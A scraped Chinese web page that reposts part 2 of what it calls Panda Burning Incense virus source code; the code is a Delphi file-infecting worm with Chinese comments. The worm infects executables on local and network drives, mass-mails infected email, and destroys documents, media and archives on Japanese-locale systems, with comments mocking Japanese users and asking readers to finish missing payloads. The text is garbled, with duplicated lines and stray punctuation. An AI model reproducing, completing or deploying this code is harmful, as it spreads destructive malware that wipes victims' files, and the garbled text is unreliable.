熊猫烧香病毒源代码(2)
电脑杂谈 发布时间:2019-07-12 19:25:04 来源:网络整理except
end;
end;
{获得可写的驱动器列表}
functionGetDrives:string;
var
DiskType:Word;
D:Char;
Str:string;
i:Integer;
begin
fori:=0to25do//遍历26个字母
begin
D:=Chr(i+65);
Str:=D+':\';
DiskType:=GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)then
Result:=Result+D;
end;
end;
{遍历目录,感染和摧毁文件}
procedureLoopFiles(Path,Mask:string);
var
i,Count:Integer;
Fn,Ext:string;
SubDir:TStrings;
SearchRec:TSearchRec;
Msg:TMsg;
functionIsValidDir(SearchRec:TSearchRec):Integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> ''''''''''''''''.'''''''''''''''') and。if (searchrec.attr <> 16) and (searchrec.name <> '.') and。if (searchrec.attr <> 16) and (searchrec.name <> '.')and。
(SearchRec.Name<>'..')then
Result:=0//不是目录
elseif(searchrec.attr=16)and(searchrec.name<>'.')and。elseif(searchrec.attr=16)and(searchrec.name<>'。if (searchrec.attr <> 16) and (searchrec.name <> '.')and。
(SearchRec.Name<>'..')then
Result:=1//不是根目录
elseResult:=2;//是根目录
end;
begin
if(FindFirst(Path+Mask,faAnyFile,SearchRec)=0)then
begin
repeat
PeekMessage(Msg,0,0,0,PM_REMOVE);//调整消息队列,避免引起怀疑
ifIsValidDir(SearchRec)=0then
begin
Fn:=Path+SearchRec.Name;
Ext:=UpperCase(ExtractFileExt(Fn));
if(Ext='.EXE')or(Ext='.SCR')then
begin
InfectOneFile(Fn);//感染可执行文件
end
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then。else if (ext = '.htm') or (ext = '.html') or (ext = '.asp')then。else if (ext = ''''''''''''''''.htm'''''''''''''''') or (ext = ''''''''''''''''.html'''''''''''''''') or (ext = ''''''''''''''''.asp'''''''''''''''') then。
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
elseifExt='.WAB'then//Outlook地址簿文件
begin
//获取Outlook邮件地址
end
elseifExt='.ADC'then//Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
elseifExt='IND'then//Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
ifIsJapthen//是倭文操作系统
begin
if(Ext='.DOC')or(Ext='.XLS')or(Ext='.MDB')or
(Ext='.MP3')or(Ext='.RM')or(Ext='.RA')or
(Ext='.WMA')or(Ext='.ZIP')or(Ext='.RAR')or
(Ext='.MPEG')or(Ext='.ASF')or(Ext='.JPG')or
(Ext='.JPEG')or(Ext='.GIF')or(Ext='.SWF')or
(Ext='.PDF')or(Ext='.CHM')or(Ext='.AVI')then
SmashFile(Fn);//摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until(FindNext(SearchRec)<>0);
end;
FindClose(SearchRec);
SubDir:=TStringList.Create;
if(FindFirst(Path+'*.*',faDirectory,SearchRec)=0)then
begin
repeat
ifIsValidDir(SearchRec)=1then
SubDir.Add(SearchRec.Name);
until(FindNext(SearchRec)<>0);
end;
FindClose(SearchRec);
Count:=SubDir.Count-1;
fori:=0toCountdo
LoopFiles(Path+SubDir.Strings+'\',Mask);
FreeAndNil(SubDir);
end;
{遍历磁盘上所有的文件}
procedureInfectFiles;
var
DriverList:string;
i,Len:Integer;
begin
ifGetACP=932then//日文操作系统
IsJap:=True;//去死吧!
DriverList:=GetDrives;//得到可写的磁盘列表
Len:=Length(DriverList);
whileTruedo//死循环
begin
fori:=Lendownto1do//遍历每个磁盘驱动器
LoopFiles(DriverList+':\','*.*');//感染之
SendMail;//发带毒邮件
Sleep(1000*60*5);//睡眠5分钟
end;
end;
{主程序开始}
begin
ifIsWin9xthen//是Win9x
RegisterServiceProcess(GetCurrentProcessID,1)//注册为服务进程
else//WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
ifCompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')=0then
InfectFiles//感染和发邮件
else//已寄生于宿主程序上了,开始工作
begin
TmpFile:=ParamStr(0);//创建临时文件
Delete(TmpFile,Length(TmpFile)-4,4);
TmpFile:=TmpFile+#32+'.exe';//真正的宿主文件,多一个空格
ExtractFile(TmpFile);//分离之
FillStartupInfo(Si,SW_SHOWDEFAULT);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,。createprocess(pchar(tmpfile),pchar(tmpfile),nil,nil,true,。createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,。
0,nil,'.',Si,Pi);//创建新进程运行之
InfectFiles;//感染和发邮件
end;
end.
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-112465-2.html
-
-
高宣教
对于没有加入公约的美国
我们可以可以不要主权